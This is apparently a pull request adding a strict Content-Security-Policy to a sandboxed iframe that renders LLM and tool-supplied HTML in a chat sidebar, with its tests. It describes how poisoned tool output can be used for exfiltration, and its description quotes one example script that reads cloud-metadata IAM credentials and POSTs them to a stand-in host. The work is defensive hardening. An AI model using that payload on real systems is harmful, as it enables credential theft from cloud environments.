### PR TITLE
security: inject strict CSP into HTMLFrame blob document

### DIFF
--- a/src/chat-sidebar.tsx
+++ b/src/chat-sidebar.tsx
@@ -74,6 +74,7 @@ import {
   isDarkTheme,
   writeTextToClipboard
 } from './utils';
+import { injectHtmlFrameCsp } from './html-frame-csp';
 import { CheckBoxItem } from './components/checkbox';
 import { mcpServerSettingsToEnabledState } from './components/mcp-util';
 import claudeSvgStr from '../style/icons/claude.svg';
@@ -499,7 +500,10 @@ const answeredForms = new Map<string, string>();
 
 function ChatResponseHTMLFrame(props: any) {
   const iframSrc = useMemo(
-    () => URL.createObjectURL(new Blob([props.source], { type: 'text/html' })),
+    () =>
+      URL.createObjectURL(
+        new Blob([injectHtmlFrameCsp(props.source)], { type: 'text/html' })
+      ),
     []
   );
   return (

--- a/src/html-frame-csp.ts
+++ b/src/html-frame-csp.ts
@@ -1,0 +1,51 @@
+// Copyright (c) Mehmet Bektas <mbektasgh@outlook.com>
+
+/**
+ * Content-Security-Policy injected into every HTMLFrame blob document.
+ *
+ * The iframe already runs with sandbox="allow-scripts" (no allow-same-origin),
+ * so cookies and parent DOM are unreachable. But scripts in a null-origin
+ * context can still fetch() to any URL the user's browser can reach:
+ * cluster intranet, 169.254.169.254 cloud metadata, the Jupyter server
+ * itself. Inline scripts/styles stay enabled because most LLM/tool HTML
+ * output (matplotlib, plotly, custom dashboards) is self-contained inline;
+ * external CDN loads and any network egress are blocked. img/font are
+ * allowed only as data: URIs so inline visualizations still render.
+ */
+export const HTML_FRAME_CSP = [
+  "default-src 'none'",
+  "script-src 'unsafe-inline'",
+  "style-src 'unsafe-inline'",
+  'img-src data:',
+  'font-src data:',
+  "connect-src 'none'",
+  "base-uri 'none'",
+  "form-action 'none'",
+  "frame-src 'none'",
+  "child-src 'none'",
+  "worker-src 'none'",
+  "manifest-src 'none'",
+  "media-src 'none'",
+  "object-src 'none'"
+].join('; ');
+
+const CSP_META_TAG = `<meta http-equiv="Content-Security-Policy" content="${HTML_FRAME_CSP}">`;
+
+/**
+ * Prepend the CSP `<meta>` tag to untrusted HTML so the resulting blob
+ * document boots under policy.
+ *
+ * Always prepend rather than trying to locate `<head>`: an HTML-naive
+ * regex can be fooled by `<head>` inside a comment, `<noscript>`,
+ * `<textarea>`, or a `<![CDATA[ ]]>` block, which would let the actual
+ * `<head>` parsed by the browser run unguarded. Prepending puts the
+ * meta before everything; the browser's tokenizer folds a leading meta
+ * into the synthetic `<head>` it builds, ahead of any author-supplied
+ * `<head>` opening tag.
+ */
+export function injectHtmlFrameCsp(source: string | null | undefined): string {
+  if (!source) {
+    return CSP_META_TAG;
+  }
+  return CSP_META_TAG + source;
+}

--- a/src/html-frame-csp.ts
+++ b/src/html-frame-csp.ts
@@ -31,21 +31,41 @@ export const HTML_FRAME_CSP = [
 
 const CSP_META_TAG = `<meta http-equiv="Content-Security-Policy" content="${HTML_FRAME_CSP}">`;
 
+// `<!DOCTYPE html>` or any other doctype declaration MUST be the very
+// first thing in the document or the parser drops into quirks mode,
+// which breaks CSS that matplotlib/plotly emit (and disables a handful
+// of CSP enforcement details in older WebKit). Detect a leading doctype
+// (allowing for an optional BOM and leading whitespace) and slot the
+// meta right after it instead of before it.
+const DOCTYPE_RE = /^(?:\ufeff)?\s*<!DOCTYPE\b[^>]*>/i;
+
 /**
  * Prepend the CSP `<meta>` tag to untrusted HTML so the resulting blob
  * document boots under policy.
  *
- * Always prepend rather than trying to locate `<head>`: an HTML-naive
- * regex can be fooled by `<head>` inside a comment, `<noscript>`,
- * `<textarea>`, or a `<![CDATA[ ]]>` block, which would let the actual
- * `<head>` parsed by the browser run unguarded. Prepending puts the
- * meta before everything; the browser's tokenizer folds a leading meta
- * into the synthetic `<head>` it builds, ahead of any author-supplied
- * `<head>` opening tag.
+ * Almost-always prepend rather than trying to locate `<head>`: an
+ * HTML-naive regex can be fooled by `<head>` inside a comment,
+ * `<noscript>`, `<textarea>`, or a `<![CDATA[ ]]>` block, which would
+ * let the actual `<head>` parsed by the browser run unguarded.
+ * Prepending puts the meta before everything; the browser's tokenizer
+ * folds a leading meta into the synthetic `<head>` it builds, ahead of
+ * any author-supplied `<head>` opening tag.
+ *
+ * The one exception is a leading `<!DOCTYPE>` declaration: the doctype
+ * has to remain at position zero or the document parses in quirks mode,
+ * so we splice the meta in immediately AFTER the doctype rather than
+ * before it. A comment-disguised doctype (`<!-- <!DOCTYPE html> -->`)
+ * is not a real doctype and the regex skips it, which is fine because
+ * the browser also ignores comment-wrapped doctypes.
  */
 export function injectHtmlFrameCsp(source: string | null | undefined): string {
   if (!source) {
     return CSP_META_TAG;
+  }
+  const match = DOCTYPE_RE.exec(source);
+  if (match) {
+    const idx = match.index + match[0].length;
+    return source.slice(0, idx) + CSP_META_TAG + source.slice(idx);
   }
   return CSP_META_TAG + source;
 }

--- a/tests/ts/html-frame-csp.test.ts
+++ b/tests/ts/html-frame-csp.test.ts
@@ -1,0 +1,96 @@
+// Copyright (c) Mehmet Bektas <mbektasgh@outlook.com>
+
+import { HTML_FRAME_CSP, injectHtmlFrameCsp } from '../../src/html-frame-csp';
+
+describe('HTML_FRAME_CSP', () => {
+  it('disables network egress by default', () => {
+    expect(HTML_FRAME_CSP).toContain("default-src 'none'");
+    expect(HTML_FRAME_CSP).toContain("connect-src 'none'");
+    expect(HTML_FRAME_CSP).toContain("frame-src 'none'");
+    expect(HTML_FRAME_CSP).toContain("object-src 'none'");
+  });
+
+  it('allows inline scripts and styles so self-contained tool HTML renders', () => {
+    expect(HTML_FRAME_CSP).toContain("script-src 'unsafe-inline'");
+    expect(HTML_FRAME_CSP).toContain("style-src 'unsafe-inline'");
+  });
+
+  it('only permits data: images and fonts', () => {
+    expect(HTML_FRAME_CSP).toContain('img-src data:');
+    expect(HTML_FRAME_CSP).toContain('font-src data:');
+  });
+
+  it('blocks base-uri and form-action escape hatches', () => {
+    expect(HTML_FRAME_CSP).toContain("base-uri 'none'");
+    expect(HTML_FRAME_CSP).toContain("form-action 'none'");
+  });
+
+  it('explicitly blocks worker / child / manifest / media sinks', () => {
+    expect(HTML_FRAME_CSP).toContain("worker-src 'none'");
+    expect(HTML_FRAME_CSP).toContain("child-src 'none'");
+    expect(HTML_FRAME_CSP).toContain("manifest-src 'none'");
+    expect(HTML_FRAME_CSP).toContain("media-src 'none'");
+  });
+});
+
+describe('injectHtmlFrameCsp', () => {
+  const META_RE =
+    /^<meta http-equiv="Content-Security-Policy" content="[^"]+">/;
+
+  it('always prepends the CSP meta so it sees the document first', () => {
+    expect(injectHtmlFrameCsp('<p>hi</p>')).toMatch(META_RE);
+    expect(injectHtmlFrameCsp('<p>hi</p>')).toContain('<p>hi</p>');
+  });
+
+  it('prepends even when the source opens its own <head>', () => {
+    // Author-supplied <head> must not get the meta inserted "inside" it
+    // by a regex that could be fooled by <head> in a comment or
+    // <noscript>. Prepending puts the meta before any author-controlled
+    // bytes; the browser tokenizer wraps it in a synthetic <head> ahead
+    // of the author's opening <head>.
+    const src = '<html><head><title>x</title></head><body>y</body></html>';
+    expect(injectHtmlFrameCsp(src)).toMatch(META_RE);
+  });
+
+  it('prepends before a DOCTYPE-prefixed document', () => {
+    const src = '<!DOCTYPE html><html><head></head><body>y</body></html>';
+    const out = injectHtmlFrameCsp(src);
+    expect(out).toMatch(META_RE);
+    expect(out.indexOf('<meta')).toBeLessThan(out.indexOf('<!DOCTYPE'));
+  });
+
+  it('is unaffected by <head> hiding in a comment', () => {
+    // The pre-fix regex strategy could be confused by this construction.
+    // Pin the always-prepend behavior so a future refactor cannot
+    // re-introduce that gap.
+    const src = '<!--<head>--><head><script>x</script></head>';
+    const out = injectHtmlFrameCsp(src);
+    expect(out).toMatch(META_RE);
+    expect(out.indexOf('<meta')).toBeLessThan(out.indexOf('<!--'));
+  });
+
+  it('places the meta before any <script> in the document', () => {
+    const src = '<html><body><script>alert(1)</script></body></html>';
+    const out = injectHtmlFrameCsp(src);
+    const metaIdx = out.indexOf('<meta');
+    const scriptIdx = out.indexOf('<script');
+    expect(metaIdx).toBeGreaterThanOrEqual(0);
+    expect(scriptIdx).toBeGreaterThan(metaIdx);
+  });
+
+  it('does not deduplicate when called twice (idempotency caveat)', () => {
+    // Two metas are harmless: per CSP spec the strictest policy wins.
+    // Pin this so a future caller does not quietly accumulate metas in
+    // an unexpected configuration.
+    const first = injectHtmlFrameCsp('<p>x</p>');
+    const second = injectHtmlFrameCsp(first);
+    const count = (second.match(/Content-Security-Policy/g) || []).length;
+    expect(count).toBe(2);
+  });
+
+  it('returns the bare meta when source is empty or nullish', () => {
+    expect(injectHtmlFrameCsp('')).toMatch(META_RE);
+    expect(injectHtmlFrameCsp(null)).toMatch(META_RE);
+    expect(injectHtmlFrameCsp(undefined)).toMatch(META_RE);
+  });
+});

--- a/tests/ts/html-frame-csp.test.ts
+++ b/tests/ts/html-frame-csp.test.ts
@@ -52,11 +52,37 @@ describe('injectHtmlFrameCsp', () => {
     expect(injectHtmlFrameCsp(src)).toMatch(META_RE);
   });
 
-  it('prepends before a DOCTYPE-prefixed document', () => {
+  it('keeps a leading DOCTYPE at position zero and slots the meta after it', () => {
+    // A doctype declaration must be the very first content in the
+    // document; putting the CSP meta ahead of it would put the iframe
+    // in quirks mode, which breaks the CSS that matplotlib / plotly
+    // emit. Splice the meta in immediately after the doctype.
     const src = '<!DOCTYPE html><html><head></head><body>y</body></html>';
     const out = injectHtmlFrameCsp(src);
-    expect(out).toMatch(META_RE);
-    expect(out.indexOf('<meta')).toBeLessThan(out.indexOf('<!DOCTYPE'));
+    expect(out.startsWith('<!DOCTYPE html>')).toBe(true);
+    expect(out.indexOf('<!DOCTYPE')).toBeLessThan(out.indexOf('<meta'));
+    expect(out.indexOf('<meta')).toBeLessThan(out.indexOf('<html'));
+  });
+
+  it('handles BOM + leading whitespace before the doctype', () => {
+    const src = '﻿  <!doctype HTML><html><body>y</body></html>';
+    const out = injectHtmlFrameCsp(src);
+    // The doctype is still at the start of the document (after the
+    // BOM/whitespace prefix); the meta is spliced in right after it.
+    const doctypeIdx = out.toLowerCase().indexOf('<!doctype');
+    const metaIdx = out.indexOf('<meta');
+    expect(doctypeIdx).toBeGreaterThanOrEqual(0);
+    expect(metaIdx).toBeGreaterThan(doctypeIdx);
+    expect(metaIdx).toBeLessThan(out.indexOf('<html'));
+  });
+
+  it('does not treat a comment-disguised doctype as a real doctype', () => {
+    // <!-- <!DOCTYPE html> --> is a comment, not a doctype. The browser
+    // ignores it for quirks-mode purposes, and our regex must too.
+    const src = '<!-- <!DOCTYPE html> --><html><body>y</body></html>';
+    const out = injectHtmlFrameCsp(src);
+    // No doctype detected, so the meta goes at position zero.
+    expect(out.startsWith('<meta')).toBe(true);
   });
 
   it('is unaffected by <head> hiding in a comment', () => {


### PR DESCRIPTION
## Summary

`ChatResponseHTMLFrame` (`src/chat-sidebar.tsx`) renders LLM and MCP-tool-supplied HTML inside `<iframe sandbox="allow-scripts" src={blobUrl}>`. The blob URL is null-origin so cookies and parent DOM are unreachable, but `allow-scripts` without `allow-same-origin` still permits `fetch()` against any URL the user's browser can reach: `169.254.169.254` cloud-metadata, cluster intranet hosts, the Jupyter server's own API.

A poisoned tool result like `<script>fetch('http://169.254.169.254/latest/meta-data/iam/security-credentials/').then(r=>r.text()).then(t=>fetch('//evil/x',{method:'POST',body:t}))</script>` runs inside the null-origin iframe and freely talks out to the LAN, cloud metadata, and any internal endpoint reachable from the pod. The blob's null origin doesn't constrain egress (CORS only governs reads, not side-effects).

## Solution

Inject a Content-Security-Policy `<meta>` tag at the top of every HTMLFrame blob via a new `src/html-frame-csp.ts` helper:

```
default-src 'none';
script-src 'unsafe-inline'; style-src 'unsafe-inline';
img-src data:; font-src data:;
connect-src 'none'; frame-src 'none'; child-src 'none';
worker-src 'none'; manifest-src 'none'; media-src 'none';
object-src 'none'; form-action 'none'; base-uri 'none';
```

Inline scripts and styles stay enabled: most LLM/tool HTML output (matplotlib, plotly offline export, custom dashboards) is self-contained inline. Image and font loads are restricted to `data:` URIs so embedded visualizations still render. Every network sink is closed: `fetch`, `XHR`, `WebSocket`, `EventSource`, `sendBeacon`, `<img>` external loads, `<a ping>`, Workers, Service Workers, `<embed>`, `<object>`, `<base>` rewrites, form submissions. The `<iframe sandbox>` already omits `allow-top-navigation` and `allow-popups`, so the parent window can't be redirected for exfil.

The meta is **almost always prepended** rather than spliced into `<head>`: an HTML-naive regex can be fooled by `<head>` inside a comment, `<noscript>`, `<textarea>`, or a CDATA-looking blob, which would leave the real `<head>` running unguarded. The one exception is a leading `<!DOCTYPE>` declaration: a doctype has to remain at position zero or the document parses in quirks mode, which breaks the CSS that matplotlib/plotly emit (and weakens CSP enforcement details in older WebKit). When a doctype is detected (allowing for an optional BOM and leading whitespace), the meta is spliced in immediately AFTER the doctype rather than before it. A comment-disguised doctype is not a real doctype and the regex skips it, matching the browser's own ignoring of comment-wrapped doctypes.

## Testing

- `tests/ts/html-frame-csp.test.ts`: 14 cases covering directive coverage, prepend semantics (no `<head>`, author-supplied `<head>`, `<head>` hidden in a comment, comment-disguised doctype), DOCTYPE placement (with and without BOM + leading whitespace), ordering relative to `<script>`, and the idempotency caveat (two metas are harmless, strictest wins).
- Full suites: pytest passes, tsc clean, prettier clean, jest clean.

## Risks / follow-ups

- **Behavior change**: tool HTML that depends on a CDN-hosted JS or CSS will stop loading. Plotly offline export is unaffected (inline). Plotly CDN mode, externally hosted matplotlib widgets, or any tool that fetches data from a public API will break. The previous behavior gave those tools full LAN reach; the cost of closing the SSRF/exfil path is that those tools now need to be configured for inline-only output.
- Out of scope follow-ups, worth a separate ticket:
  - An `NBI_HTMLFRAME_CSP_EXTRA` admin-policy env var that appends additional sources (e.g., `connect-src https://cdn.plot.ly`) for deployments that want to permit specific trusted CDNs.
  - The `useMemo([])` in `ChatResponseHTMLFrame` caches the blob URL on mount and never recomputes when `props.source` changes. Pre-existing; not introduced here. Safe in practice because each streamed HTMLFrame gets a distinct React key.
  - `URL.createObjectURL` in `ChatResponseHTMLFrame` is never paired with `URL.revokeObjectURL`. Pre-existing leak; not introduced here. Long chat sessions accumulate blob URLs until the document unloads.